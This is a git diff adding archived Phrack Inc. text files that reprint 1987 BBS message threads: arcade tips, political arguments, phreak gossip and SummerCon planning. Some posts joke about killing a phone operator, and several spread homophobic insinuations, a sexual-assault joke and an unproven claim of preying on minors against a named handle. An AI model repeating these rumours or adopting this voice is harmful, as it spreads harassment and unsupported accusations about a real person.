+basicaly agree with it.  Sure some people will keep being involved but most
+wont have the time, equipment, and the fact that they will no longer be treated
+as a minor by the law will act as a detriment.  (no that sentence wasnt
+constructed right...)
+
+Yow Lex...Cyberpunk for ever...Speaking of which (this belongs on the phrack
+sub but Ill forget so...) would anybody be interested (besides me) if I somehow
+managed to interview William Gibson, author of Neuromancer & Count Zero, about
+what he thought the future of "computer crime" was?  Make it into a file & put
+in in phrack.  Well *I* think it would be cool.
+
+sfd
+
+
+
+64/100: Dial 0 for harassment
+Name: Taran King 1
+Date: 12:50 am  Sat May 16, 1987
+
+Ok, me and Bill are here right now on my 3-way with the 0perator.  We had her
+connect us to 314-070-1000.  Bill said that he was priveledged and that he had
+to speak to his brother in the post office.  When we thought the 0perator had
+left the line, Bill proceded to simulate an 800 DA ring with his lips. When the
+operator came on, he asked for the first company with Banana in its name and we
+were given Banana Educational Software and cracked up.  We were hooked up to a
+recording.  After the recording said 800-328, the operator came on and said she
+was reporting this line.  She said she has had previous accounts... The
+operator then paused and said, "Yes, yes I'd like a trace.  The number is
+314-432-0756, good you traced it."  She then proceeded to access another loop
+and keep us on hold for several minutes.  Oh, forgot a part.  After she finally
+consented to connect the number, Bill said that she could go, and she says,
+"No, I want to hear this!" and then she became silent until she started being
+rude and decided that she was working for the FBI and set up a trace.
+
+ANYWAY, after being put on hold for a few minutes, she came back and we
+requested the supervisor and she wouldn't give her to us.  We eventually got
+dropped.  We couldn't even file a complaint because we didn't have her fargin'
+name.  I say we kill her.  I say we hang her, then we kill her.  I say we
+tattoo her, then we scorch her, then we hang her, and THEN we kill her.
+
+I say you give her to me!
+-TK
+
+
+
+
+65/100: The Modem World
+Name: Knight Lightning 2
+Date: 9:44 am  Sat May 16, 1987
+
+Yes that is correct, as many of us get older, the laws surrounding us are due
+to change will will affect our outlook as to just how important the phreak/hack
+community really is to us.  Some of the people that feel threatened may start
+paying for calls rather than phreak, but this then gets expensive.
+
+Furthermore, in college, there is most liklely little time for this.  Now Lex
+may disagree becuase his exsperience may be a bit differenet, but he also takes
+anout a month or more off between calls here.  In reference to Cheap Shades, he
+ran Metal Shop AE here in StL.  Then off to college, he brought the computer
+and put up QuickShop.  However, he had little time to use it and the necesssity
+to use his only voice line (the bbs line) came up more and more often.
+Eventually he just took it down and he doesn't call anywhere.
+
+I said that the class of 87 going to college would harm the phreak world, not
+destroy it and I still hold that opinion.
+
+:Knight Lightning
+
+
+
+
+66/100: HBO
+Name: Lotus 38
+Date: 11:04 pm  Sat May 16, 1987
+
+Did anyone happen to catch the HBO special about the Chicago trial?  Geez, if
+that thing doesn't get you mad about cops and the political system in so me was
+(ie the system) I don't know what would. The interesting thing is that Hoffman
+is still out there fighting the causes.   Does he still live in NY or what?
+
+
+
+67/100: Abbie
+Name: Thomas Covenant 84
+Date: 6:03 am  Sun May 17, 1987
+
+There was an article on him in PEOPLE a couple years back (5-7 years, maybe?)
+that told what he was doing currently. I have no idea on the situation today.
+I love selective memory! I can remember dumb things like that, but can't
+remember where I left my tie -- and I have to leave for work in 2 minutes!
+ARGH!
+
+
+
+
+68/100: WELL...
+Name: Sir Francis Drake 56
+Date: 6:22 pm  Mon May 18, 1987
+
+Geez, Abbie has been in the news alot recently.  He was arrested along with Amy
+Carter for trespassing on CIA property.  When they went to court there defense
+was that they were breaking a law in order to stop a larger crime (which means
+it is legal, example a person runnin a red light to chase a bank robber or some
+such)...AND THEY WON!  So basicaly the federal court admited that the CIA is
+breaking laws...A pity they dont fucking do something about it.
+
+But yeah, he's a great guy.
+
+sfd
+
+
+
+
+69/100: Back to voting.
+Name: Evil Jay 26
+Date: 2:40 am  Tue May 19, 1987
+
+  I hear, Im stupid for not voting, Im fucking up the world by not
+participating. I wonder if any of you voted for Raygun, eh?
+
+-J
+
+
+
+
+70/100: Summercon.
+Name: Evil Jay 26
+Date: 5:54 am  Tue May 19, 1987
+
+    Read my latest attempt at humor (if you can stomach it) on drive H. File is
+called ADVENTUR.TXT. Its actually called, Tales of Misadventure - Summercon.
+And while Im probably not a seer you will see my prediction of the adventures
+I'll have at Summercon. Lets hope not of it ever comes to pass.
+
+-J
+
+
+
+
+71/100: Hoffman
+Name: Doom Prophet 21
+Date: 6:52 pm  Tue May 19, 1987
+
+I think that Hoffman was charged with 'Disturbing a school' and disorderly
+conduct. Amy Carter supposedly sat down in front of a vehicle (a bus or an
+oinkmobile). It was on a universityy campus, not CIA property (unless they
+made that up recently). I followed it in the papers also, it was interesting
+to see something like that happen. The CIA have not stopped with Nicaragua,
+but now we have dragged Honduras, Mexico, Isreal, and other countries in our
+feud with the Sandinistas, along with CIA/DEA dealings involving drug smuggling
+to fund the Contras.
+
+While we're on this topic, I just read an article in  Reader's Digest that
+basically called the nuke freeze movement communist and corruptive. He had
+some good points however, which only goes to show that both the U.S. and Russia
+are at fault in certain situations. The test ban breaking by Ronn ie was shitty
+though. All the true important details are underplayed anyway.
+
+Good day
+
+Doomy
+
+
+
+
+72/100: Part II
+Name: Evil Jay 26
+Date: 10:39 pm  Tue May 19, 1987
+
+   Will be up by the time you read this. If your are dreading Summercon this is
+what you can (not) look forward too. hehehe...
+
+-J
+
+
+
+
+73/100: Part III
+Name: Evil Jay 26
+Date: 6:48 am  Wed May 20, 1987
+
+   Well, (yet another msg) Part III is finished and up. The Summercon Saga is
+over. Im sure you'll be sickened and appalled, but that was the whole purpose
+wasnt it? How about "Summercon 2001"?
+
+
+-J
+
+
+
+
+74/100: What the fuck....
+Name: The Disk Jockey 13
+Date: 7:16 am  Wed May 20, 1987
+
+....is the deal now?  Goddamn Iraq "accidentlly" shoots a missle from a
+russian-made aircraft to an oil ship, owing the hull all to hell, their
+president says "It was a gastly accident" and when this ship was trying to call
+the US to ask permission to return fire, Congress was recessed, and Reagan was
+getting on a plane to go to Tennessee to talk to some fucking high school for
+thier commencment.  37 fucking people are dead at last count, and the only
+thing that Ron has to say is "We are going to have a complete
+investigation...."  Right!  The US is really beginning to look like saps to
+these fucking shit-head countries, and Ron's other comment was "Any action
+simular to that in the future will be delt with severly."
+
+What an asshole.
+
+                                       -A pissed off Disk Jockey
+
+
+
+75/100: Wimper..
+Name: Ax Murderer 7
+Date: 5:41 pm  Wed May 20, 1987
+
+Yeah, while he's getting stiff talking to a group of high schooler's, men are
+dying. SUUUURE! It was an accident. Just like it was an accident when he bombed
+Libya...Sure. I think we should have at least fired back. Reagan always seems
+to wimp out on some. He is better than any other we've had, but please!
+
+ Ax Murderer
+
+
+
+76/100: well...
+Name: Sir Francis Drake
+56
+Date: 6:22 pm  Wed May 20, 1987
+
+Aurgh, just when I was begining to think that MSP users were not Reagan
+lobotomized zombies the old "Dont let those little countries push us around, we
+should nuke 'em into oblivion" comes back.  Yucky.
+
+First of all DJ, I heard the plane that shot the french missle at our ship was
+either a) french or b) american (phantom)...So lets not do a "god damned
+russians are behind everything"
+
+Maby it was sorta silly having the ship being there in the first place ya know?
+
+(Yeah doomy, it was on Amy Carters school campus but it was the CIA recruiting
+center on it where the demonstration took place)
+
+sfd
+
+
+
+77/100: well
+Name: Lex Luthor 36
+Date: 5:20 pm  Thu May 21, 1987
+
+No matter what America does, we would/will be criticsized. If we retaliated
+about the iraq incident we would be bullies again. If we didn't (we didn't as
+you know) then we will be too soft. Its a no win situation. When we bombed
+libya we were bullies. But if we didn't we would be wimps. Its bullshit. Damned
+if we do and Damned if we don't.
+
+
+
+
+78/100: Bombing
+Name: The Sensei 18
+Date: 6:21 pm  Thu May 21, 1987
+
+   The Iraq accident may be real.  The ship didn't have any defences ready.
+Now they tell us it was 2 assault missiles. There is not much Reagan can do.
+He can't punish them, they get nothin g major from us.  Reagan made a good
+decision on the Libyan deal, he's don e his job.  How many terrorist have
+screwed with Americans lately?  Not many.
+
+Ts
+
+
+79/100: Whoa!
+Name: Cheap Shades 3
+Date: 1:38 am  Fri May 22, 1987
+
+First of all accidental or not, it shouldn't have happened.  Secondly the
+captain of the ship did have permision to fight back. It was under attack. The
+captain just didn't switch from automatic to manual soon enough to shoot
+anything.  Thirdly, the plane was American made and the missle was French
+(like SFD said), they have that shit because we support Iraq's side in this
+Iraq vs Iran war.  We could easily punish Iraq for what they did but then we'd
+lose our initial investment in their struggle.
+
+    Later
+       Shades' $0.02
+
+
+
+
+80/100: DIS
+Name: Doom Prophet 21
+Date: 6:35 am  Fri May 22, 1987
+
+Hmm..on Libya, the press releases from the White House were lies. Khadafy
+didn't threaten us with further terrorism, the U.S. used his country for a
+scapegoat for the American people. However, the disinformation was vastly
+underplayed in the very same news we were brainwashed with. A lot of papers and
+news media is owned by large corporations. Do you want the businesses that
+caused an invasion of Cuba in this century to put thoughts into your head? So
+the Soviets invaded Afghanistan in 79. But of equal tyranny was thte U.S.
+foreign policy toward Cuba (since our business is threatened by Castro we will
+make war and the excuse will bbe we were fighting communism) earlier on. So
+both of the superpowers suck. Now we have to support another war. How long
+will it be before we are having Blood and Guts rambozos like Ollie North
+running around in a mess of secret things 'to protect our national interest'.
+
+America wants oil, to get it, it needs puppets
+So what's 10 million dead if we're keeping out the Russians?
+
+-Dk
+
+Doomy
+
+
+
+
+81/100: Steal This Book
+Name: Icarus 15
+Date: 8:48 am  Fri May 22, 1987
+
+Hoffman's book seems very interesting.  Does ANYONE know where I can get a copy
+of it?  Who published it?
+
+Icarus
+
+
+
+
+82/100: Switching
+Name: The Sensei 18
+Date: 7:15 am  Sun May 24, 1987
+
+  I believe it was from Manual to Automatic.  The guy had it on manual.. .and
+was half asleep.  With all the commosion, etc...no-one could think.
+
+Ts
+
+
+
+
+83/100: My little Droogies
+Name: The Executioner 19
+Date: 9:44 pm  Tue May 26, 1987
+
+After all this time, same old faces and names...
+
+Everyone like PHRACK 13? I know I had a joy writing it...
+
+Well...cei la vie eh?
+
+
+
+
+
+84/100: One more time around
+Name: The Executioner 19
+Date: 9:52 pm  Tue May 26, 1987
+
+Yes, count them, TWICE I will leave a message...
+
+Is the rad bbs ShadowSpawn!!!!! still up? just a little note of curiosity,
+bordering on the verge of total spasms of laughter....
+
+And what about HPO? whats the deal fellas??
+
+God
+
+
+
+
+85/100: SHADOWspawn
+Name: Lucifer 666 43
+Date: 11:40 pm  Tue May 26, 1987
+
+PW took it down to do some work and to have the line and also to make some
+money ???| ask ctrl c... you should be seeing it back up this summer, ex.
+
+L666
+
+
+
+
+86/100: HPO
+Name: Mad Hatter 51
+Date: 2:49 pm  Wed May 27, 1987
+
+Hell Phrozen Over is down now because of hard disk problems.  He got his
+computer back then the drive went...
+
+
+-Hatter
+
+
+
+
+
+87/100: Oh neat
+Name: The Executioner 19
+Date: 6:05 pm  Wed May 27, 1987
+
+Well, that's seems really sad, HPO had I think the longest duration without
+ever being down...hmm...oh well...it twas a nice system, no?
+
+U2 in concert was aweomse....
+And front row to the Psychedelic Furs was the best...
+
+Genesis on Saturday and Billy Idol on Tuesday...can't wait
+
+Exy
+
+
+
+
+88/100: General stuff..
+Name: Kerrang Khan 34
+Date: 2:00 am  Thu May 28, 1987
+
+i just found out how to beat a videogame called Galaga the other day.  If you
+leave the bottom left bee-like creature alone on the first 'stage' and let it
+swoop by for about 10 minutes, eventually it will stop shooti ng at you.  at
+that point you can kill it, and for the rest of the game, nothi ng will shoot
+at you.  kind of interesting.  i've found alot of odd 'bugs' in video-games
+over the years (tempest, defender etc)..  although i don't spend too much time
+playing them, i like hearing about these things. anyone give a hoot, or shall
+we go back to discussing CAMA tapes (by far the more important to me, ahem)..
+or is it AMA tapes...  who cares.
+
+  k
+
+ps: anyone still prefer a decent pinball game to video games these days?
+
+
+
+
+
+89/100: A neat game
+Name: The Executioner 19
+Date: 10:12 am  Thu May 28, 1987
+
+A neat video game I saw was called "Contra", really fast and furious, also a
+game called Rolling Thunder was interesting. The Joust Pinball game is pretty
+fast, but I still prefer the video game if and when i drop by an arcade.
+
+Exy
+
+
+
+90/100: Tempest....
+Name: The Disk Jockey 13
+Date: 11:00 am  Thu May 28, 1987
+
+What can you do with Tempest?  I have the actual game at home, about the only
+thing that I have ever found is that on some settings you can press the player
+one button and you can jump to the next level....
+
+                                       -The Disk Jockey
+
+
+
+91/100: Games
+Name: Lex Luthor 36
+Date: 1:56 pm  Thu May 28, 1987
+
+I prefer pinball since most videogames are too slow for me. Pinball can be
+quick and keeps me interested. High-Speed is one of the better games.
+
+Most people know that on Defender after you reach 990,000 every thing you hit
+gies you a free guy up until 1 million when it "rolls over" to 0 again. You
+don't receive new guys again until the last of your men are used up. It is
+recommened to not use that many smart bombs during this time and let the guys
+die. If you can get to a million then you should never have to worry about not
+being able to get free men. Personally I think defender is one of the best
+games of all time, since it has all the action I need. Asteroids Deluxe, the
+hard one is a good game, just you can't find it anymore.
+
+
+
+
+92/100: Gauntlet
+Name: Slave Driver 58
+Date: 9:10 am  Fri May 29, 1987
+
+
+ and Gauntlet II are two very good games if you have 4 people that know how to
+play the thing.  Galaga is a very good game, but my personal favorite is Qix,
+yes, I know thats sad, but hey...
+
+ On that Stark thing, the reason they didnt have that defense system on auto is
+as follows.  First of all it uses extremely hig density lugs weighing 30 lbs
+and shoots 3,000 a minute.  It uses radar to track the thing in and just blasts
+the shit out of it.  The problem is, anything of any decent size with radar
+would get the shit blown out of it, its not selective.  I dont think it would
+be too nice to be coming in in a little helicopter (sp?) and have this thing
+shoot 3000 rounds a min at you.  Something like that could ruin your day...
+
+  The Exocet the missle that hit them| travels several hunderd miles an hour at
+a distance of 8 feet from the water.  Neithers the AWACS nor the ship detected
+the launch on radar, although the ship detected Radar Lock always a sign of
+agression.  They did not know the thing was coming till they spotted it
+visually.  By the time word got to the Information Center, they had 7 seconds
+to respond... oh well...
+
+Slave Driver
+
+Sorry, U2's music was good, but the concert wasnt that great.  But I guess you
+had to go to a lot of previous concerts to know that...
+
+
+
+93/100: Video's
+Name: The Mad Hacker 47
+Date: 6:55 pm  Sat May 30, 1987
+
+My Favorite Video Game has to be Robotron. Weird game. When I first played it,
+I spent all kindsa Quarters without too much luck. Last time I played it I Let
+the game go at 9 Million Something. Only thing is you have to have an afternoon
+to play.....
+
+                                 The Mad Hacker
+
+
+
+94/100: Games
+Name: Icarus 15
+Date: 3:19 am  Sun May 31, 1987
+
+The best pinball game is Pinbot.  Before that; High Speed. Does anyone remember
+Zookeeper?  That was a great videogame, except it can't be found anywhere.
+
+Me
+
+
+
+95/100: Jake Cutter
+Name: Control C
+8
+Date: 10:00 am  Sun May 31, 1987
+
+Is one of the best games.  It's kinda slow, no sound, but it's a great game.
+Also The Heist is fun too.
+
+
+
+
+96/100: well...
+Name: Sir Francis Drake 56
+Date: 11:29 pm  Sun May 31, 1987
+
+Two Tigers can be cool with two people..
+
+sfd
+
+
+
+
+97/100: Video ames
+Name: Mad Hatter 51
+Date: 12:00 pm  Mon Jun 01, 1987
+
+hI usually a Gauntlet player.. I got some friends and we just fuck around with
+it.. Paperboy is a little old, but still good..  1 1/2 hours left of
+school(tomorrow)... W0W!
+
+
+
+
+-Hatter
+
+
+
+
+
+98/100: tempest and things..
+Name: Kerrang Khan 34
+Date: 12:37 pm  Mon Jun 01, 1987
+
+the low down on tempest -
+
+first you have to play normally until you reach the red V shaped level.
+when you reach the one after that (a square-ish V) you can die or (read
+on)
+
+you have to get a score over 170,000 for this bug to work (the red V's bonus is
+something like 180k so its easier to just die and play a new game.  in order to
+get 170k+ on one quarter requires you get up into the yellow levels which is
+kind of tough).  anyway, once you have 170,000 plus point the key is to get the
+last two digits of your score to a specific number and then just die.  you can
+jump your score by two points by shooting 'spikes' and by one point for
+finishing off a spike (you work it out).
+
+some interesting two digit numbers are
+
+12, 17 - 40 free credits
+05     - dumps you into playing the attract mode (more on this)
+00     - freeze game in attract mode
+01     - reset game (puts you into the maint. screen)
+46     - changes level you can start at.
+48     - lots and lots of 'ships' (mode on this too).
+
+you set up your score and die, then wait for the game to cycle through
+the attract mode, and then things will happen.  17 just starts adding credits
+and you can play normally, but you can have much more fun with 05. this just
+dumps you into the game tempest will be playing with itself. at this point, ALL
+the strange things you can trigger off will go on while you are playing.  if
+you can hit 48 your ships will start multiplying, up to about 255 (guess), and
+if you can do this, you hit 01 and wait after which your game will 'normalize'
+and you can play all day to some outrageous high score.  if you hit 00 though,
+the xDgame will freeze up on you.  anyway thats a rough outline, and it only
+works on older versions. how did you get your own tempest machine DJ?
+
+  k
+
+highspeed isnt a game, its a way of life.
+
+"Dispatch to 504.... he what?"
+
+
+99/100: New Modz!@!!
+Name: Taran King 1
+Date: 5:23 pm  Mon Jun 01, 1987
+
+Try out our new modz, compliments of Cheap Shades.  The N:eed Acronyms is now
+a separate database-type function with search string and all so if you're
+baffled, you can search for the specific acronym without listing the whole damn
+thing.  Use it well
+-TK
+
+
+
+
+100/100: Farrari
+Name: The Sensei 18
+Date: 6:05 pm  Mon Jun 01, 1987
+
+   I usually play the Farrari game.  I've only gotten up to around 67 grand.
+The game allows you to sit down and get a stereo sound with the whole machine
+moving with you.  Such as a car would do.
+
+   As for U2 concert....I'm still waiting for it to hit MN.  Idol was great.
+So was the Cult.
+
+Ts
+
+
+
+Post on Metal/General Discussion? No
+
+                                      ^*^
diff --git a/phrack20/6.txt b/phrack20/6.txt
new file mode 100644
index 0000000..9d59761
--- /dev/null
+++ b/phrack20/6.txt
@@ -0,0 +1,1658 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 20, File 6 of 12
+
+
+                  Metal Shop Private's -- Phrack Inc./Gossip
+                  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The Phrack Inc./Gossip subboard included mostly conversation involving gossip
+in the phreak/hack world as well as the discussion of files for and the
+organization of the Phrack Inc. newsletter.
+
+
+1/100: well...
+Name: Sir Francis Drake 56
+Date: 6:26 pm  Wed Apr 29, 1987
+
+Yet another version...
+
+PWN PWN PWN PWN PWN PWN
+
+St. Louis - Well, the SummerCon has come and gone and nothing has changed.
+It started off well, with almost 80 people arriving.  We knew something was
+wrong when people wouldn't put nametags on becuase they were embarresed. And
+then when they all drank large amounts of beer, it was realised "Hey! These
+phreaks arn't any differnt!  There just typical teenagers who beli eve being
+drunk is fun 'cause the rest of the time they feel so shitty.  No one was
+busted, the police just felt sorry for the weak attempt at Dyonisiun excess.
+Oh well, maby someday people will realise that false bravado and bragging of
+inebriation is simply stupid.
+
+"Hey, that wasn't even funny."
+
+sfd
+
+
+
+
+2/100: Umm...
+Name: Knight Lightning 2
+Date: 11:24 pm  Wed Apr 29, 1987
+
+Hey SFD, you need to title those articles remember?  But seriously, SummerCon
+will undoubtably be a quite fun activity but lets face it, no one is going to
+learn much about phreaking or hacking that weekend, not with all the excitement
+of meeting new people and partying, which kinda relates that you'll forget
+everything anyway.
+
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Phreak World Crippled; SummerCon Causes Despair            June 22, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Today the phreak world was astounded and dealt a horrifying blow as all the
+phreaks who attended summercon, left with their entire phreak knowledge
+literally erased from their minds due to an excess of drinking and other
+unknown mind altering substances.  it is unknown as to if these effects are
+temporary or a lifetime destruction.
+
+PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Anarchy World Takes Charge               June 23, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+MetaliBashers Inc, have become the new "LOD" of the modem worl since all of the
+LOD members no longer can even remember what LOD stands for (in fact no one
+can).  With MBI taking charge, the new wave of the modem world has turned
+strictly anarchy although there are rumors of various pirating organizations
+beginning to unload new wares soon.
+
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Investigators Lose Jobs!
+~~~~~~~~~~~~~~~~~~~~~~~~
+John Maxfield reportedly lost ALL contracts today when it was discovered that
+the phreak/hack community was completely destroyed thus no one needed
+protection from them.  He has now taken a job with the local sanitation
+management firm to help figure out what to do with all the garbage now that the
+phreak community wasn't stealing 1/3 of it anymore.
+
+
+Hey this is getting fun huh?
+
+:Knight Lightning
+
+
+
+3/100: I heard
+Name: Evil Jay 26
+Date: 11:56 pm  Wed Apr 29, 1987
+
+    straight from the horses mouth that The Rebel and some other people from
+that crowd are going to show. I actually got to hear the entire Howie episode.
+According to Rebel, Howie was busted, went to court and when his mother found
+out what he was doing (again) she completely and foreverly (bros?) took away
+his phone privelidges. I dont know about that...but oh well. I also heard from
+quite a few people who have met Exy, Delta-Master and Bill from RNOC in person
+and the comments I receved were ...interesting.
+
+PWN PWN PWN PWN PWN PWN PWN
+
+Suicidal Nitemare - History
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+   Suidical Nitemare met death head on when Evil Jay knocked on his door
+pretending to be a lineman checking on his line. Once inside, Jay prceeded
+to swing a hand set at Suicidal with amazing acurracy (sp). Once dragged
+outside, Jay then proceeded to tie Suicidal naked to a tree and call the
+ever-lovin' Broadway Hacker over to do his stuff. Jay was last heard pleading
+insanity. Suicidal Nitemare remains in intensive care, and Broadway Hacker is
+happy.
+
+                                                 -J
+
+
+4/100: Michigan
+Name: Control C 8
+Date: 2:10 pm  Thu Apr 30, 1987
+
+Doug,
+
+   Bad Subscript. LoneWolf, and I are all planning on going. Maby we could work
+something out. I think Ax Murdere, and Sir William will be going too.
+Call me and we'll talk about it.
+
+   Control
+
+
+5/100: ROOMS
+Name: Lucifer 666 43
+Date: 4:07 pm  Thu Apr 30, 1987
+
+If broadway decides the stay in the public rooms then I'm not in that one...
+
+also will it be like nametags?
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+|  hello I am            |
+|
+|   TARAN KING- randy    |
+__________________________    and so on....
+
+also, I was wondering about the bust scene cause if I get busted in st louis,
+there is no way in fuck I could get bail money...
+
+liquor, drugs,... driving with craig etc...
+
+L666
+
+
+6/100: Community rooms
+Name: Knight Lightning 2
+Date: 7:02 pm  Thu Apr 30, 1987
+
+Broadway is being banned from using the community rooms.  If he goes, he will
+have to get his own, and I heard that this is what he claimed he would do if he
+went.  I really don't think there is going to be any busts as long as no one
+brings anything real illegal, like a blue box or is standing down at the pay
+fones with a page and a half of codes in front of a cop or something.
+
+  3
+L6  What do you mean driving with me?
+
+:Knight Lightning
+
+7/100: I do.
+Name: Evil Jay 26
+Date: 12:05 am  Fri May 01, 1987
+
+    Because of the large amount of drinking and other crap, I'll bet my ass
+that more than 1 minor gets busted. I think we should all find some park or
+something. Actually, the better thing to do (which wont and probably cant be
+done now) is to rent some building for the night. Ive been to a few partys
+where they did that. No cops, outrageously loud music...it was great... wasnt
+cheap, but if everyone pitched in....
+
+-J
+
+8/100: Hotel Parties
+Name: Mad Hatter 51
+Date: 6:57 am  Fri May 01, 1987
+
+i'm not very fond of them.  I went to two of 'em and they both got busted.
+What are we(you) going to do if someone gets busted?  I'm sure as hell that I
+don't want my parents getting a call from St. Louie PD saying, "Ahh, yes, Mr.
+xxxxxxx, you son was picked up at a hotel party for underage drinking. Can you
+please come pick him up?"  Also, what about bail money?  Jez, your screwed if
+you get picked up.
+
+-Hatter
+
+KL, since BH is NOT allowed in the public rooms,(and if I go with him) does
+that mean I can't stay there?  Any other k-rad d00dzz coming?
+
+
+9/100: Heh
+Name: Taran King 1
+Date: 7:06 am  Fri May 01, 1987
+
+No, you can stay in the room with the rest of the people, Hatter.  I haven't
+even heard about this banning Bway from the room, so maybe KL's making
+decisions for Forest Ranger, but I'm not getting involved in the personal
+schtuff.  A LOT of people are getting their own rooms so that they won't be
+stranded in the middle of nowhere if they get kicked out.  We will just have to
+keep it moderated (not the drinking, just the noise).  If you (you) know that
+you're getting down here by some manner, please leave feedback saying what form
+of transportation you're using so that I can get an idea of how many trips to
+each station will be made, carpools can possibly be created, etc.
+-TK
+
+
+10/100: Drinking
+Name: The Scanner 20
+Date: 8:24 am  Fri May 01, 1987
+
+ Whats the drinking age in St. Louis anyways? Please tell me they havent hit 21
+yet.
+
+
+11/100: SFD
+Name: Doom Prophet 21
+Date: 4:26 pm  Fri May 01, 1987
+
+I'm glad that someone has a dissenting opinion on the drinking scene. While I
+do like to drink (on an average of about maybe 1 or 2 times a month, unless
+parents are gone or something), I also think that bragging about drugs and
+alky takes/shows no intelligence, and the person who refrains from doing that
+is a non-conformist. A bunch of people at my school call me 'the Anti-Pot
+Crusader' and similar names because I dislike hearing about how fucking drunk
+and stoned, etc, everyone got over the weekend for 2 hours straight. But tht
+doesn't mean I think it's wrong (unless someone is abusing, etc, selling shitt
+to buy drugs). You could take myy messsage as being a 'conformist' drinking/etc
+post since I stated some things about TK being drunk and pu king, but I don't
+consider it that myself.
+
+
+Doomy
+
+
+
+12/100: well...
+Name: Sir Francis Drake 56
+Date: 8:07 pm  Fri May 01, 1987
+
+yup, glad to see you understand my position.  Of course it is equaly lame to
+brag about how you never dring/take drugs.  The key of course is to do what you
+actualy want to do, not what you have vbeen conditioned (by society and of
+course the dreaded 'p-pressure') to do.
+
+sfd
+
+
+13/100: Drinking Age
+Name: The Spectre 82
+Date: 8:25 am  Sat May 02, 1987
+
+<I'm sure you are all wondering "who the hell is The Spectre?"  Don't worry
+about it.> The drinking age in St. Louis, and all of Missouri, for that matter,
+is 21. Has been for a long time.  And since most people on here are under 21,
+that could pose some problems.
+
+
+14/100: Broadway
+Name: Knight Lightning 2
+Date: 10:13 am  Sat May 02, 1987
+
+Oh, ok Randy, you can sleep in the same room with Broadway.  Don't bend over
+for the soap.
+
+Forest Ranger did make some comments and so did Taran on Atlantis.  We have to
+remember the saftey of the people going and without sounding crude, the
+question of Broadway's sexual preference has never been answered conclusively.
+There are several people who plan to attend that would be very concerned about
+their personal well-being if they were forced to room with Broadway and I think
+that it would just make things simpler if B-way grabbed his own room.
+
+:Knight Lightning
+
+
+15/100: I still.....
+Name: The Disk Jockey 13
+Date: 12:54 pm  Sat May 02, 1987
+
+think that Broadway won't show.....
+
+
+
+16/100: Retraction
+Name: Phantom Phreaker 46
+Date: 10:51 pm  Sat May 02, 1987
+
+ I must 'apologize' (for lack of a better word) for my using of Broadway
+Hacker's name in that post, I feel that it is red, and weak for someone to rag
+on the ragee-of-the-month, behind their back. I personally have only one thing
+against him, and that is his bullshit story about a year ago when he to ok
+Radio Station down, and I believed him like a fool and took my board down and
+panicked. That just showed me that I can't really trust what he says. In all
+honesty, he did run a good BBS for a while, you can all give that much credit
+to him.
+
+Phantom
+
+
+
+17/100: Bragging???
+Name: Evil Jay 26
+Date: 1:19 am  Sun May 03, 1987
+
+    Somehow I feel some of these comments are directed towards me. Well,
+hell... I have a good time, why shouldnt I say so? I dont think I brag.. .I uh.
+
+-J
+(lame, lame LAME post...)
+
+
+
+18/100: B-Way
+Name: Jester Sluggo 31
+Date: 12:13 pm  Sun May 03, 1987
+
+If the guy shows up, then he shows up.  You can't make plans around him.
+
+As for partying, if you wanna get smashed drunk and make a fool out of
+yourself, go ahead.  I'll drink, but drink moderately (about 6 beers/Hour).
+As for trading info, or getting busted; DON'T bring anything REAL illegeal.
+Others have said this, and I hope that nobody blows it for the rest of us.
+
+About the drinking age: as long as you stay in the damn room and drink, and
+keep somewhat quiet, there should be very little of a problem.  For buying
+booze, I should be able to buy (even though) I'm not old enough,  because
+I'm big enough..   I think TK is a witness to that.    Moosehead!
+
+ /
+ \
+ / luggo !!
+
+
+
+19/100: S-Con stuff
+Name: Knight Lightning 2
+Date: 4:13 pm  Sun May 03, 1987
+
+Ok ok, Forest Ranger says that until Broadway has actually been proven to be a
+homosexual that he shall be innocent until proven guilty.  In other words well
+he met Cap N Crax who met Broadway and Cao said he was ok, but I remember many
+others like Monty Python who met him and told us all about how Broadway just
+wanted to wrestle him in people's lawns and get him drunk. Will SummerCon
+finally answer the question?
+
+As I have stated before, DO NOT bring BLUE BOXes or anything else.  DO NOT
+bring a 125 page list of SPC, MCI, MEtro, and TMC codes, DO NOT bring firearms
+or knives (Scan man will have that part covered), DO NOT bring your mom, DO NOT
+bring the police, DO bring your toothbrush.
+
+:Knight Lightning
+
+
+
+
+20/100: Broadway Hacker
+Name: The Prophet 23
+Date: 5:34 pm  Sun May 03, 1987
+
+A person by the name of S. K. Ericson once told me that this guy would card
+airplane tickets for very young hackers to New York to attend the TAP meetings,
+then refuse to card them the tickets home unless they gave in to his
+advances... SICKHe offered no proof of his accusations, though.
+
+  -TP
+/l
+
+
+21/100: Hack-A-Trip
+Name: Knight Lightning 2
+Date: 7:10 pm  Sun May 03, 1987
+
+Well, he is always inviting people to New York and asking them if they would
+like to stay at his place.  He also likes to get people's addresses and make
+plans to visit them.  BH was also the founder of  Hack-A-Trip, so this theory
+could have some tangibility.
+
+:Knight Lightning
+
+
+
+22/100: Nametags?
+Name: Thomas Covenant 84
+Date: 8:37 pm  Sun May 03, 1987
+
+Well, I may wear a skating cap that says "urLord", but aside from that, forget
+about it. I hate walking in into some place and some lady leaps out from behind
+a pillar and slaps a nametag on my tit saying "Hi! My name is Ian !" That
+happened to me once, and I used an old Erma Bombeck line: "Now, what shall we
+name the other one?" And Kip may wear his k00l vanity plate reading 616 HAK.
+
+
+
+23/100: Nametags
+Name: Knight Lightning 2
+Date: 11:06 pm  Sun May 03, 1987
+
+Well they are optional of course but remeber you are gonna have a hard enough
+time trying to learn everyone else's name without having to worry about them
+forgeting who you are (er whatever).  Wear em if you want em.
+
+"Hi...My Name Is Knight Lightning...Unless Your Name Is Scan Man."
+
+Ba
+
+:Knight Lightning
+
+
+
+
+24/100: innocent
+Name: Lucifer 666 43
+Date: 11:51 pm  Sun May 03, 1987
+
+till proven guilty??? so when we find some guy hopefully someone not liked in
+the middle of the hall with a bloody swelling anus, crying, screaming "all I
+wanted was a US sprint code... I didnt know he'd do that....sob hes aid sob
+he would give my an account sob| on the Radio.... well now....fucking russian
+roulette... who will be the one to be butt-s macked?
+
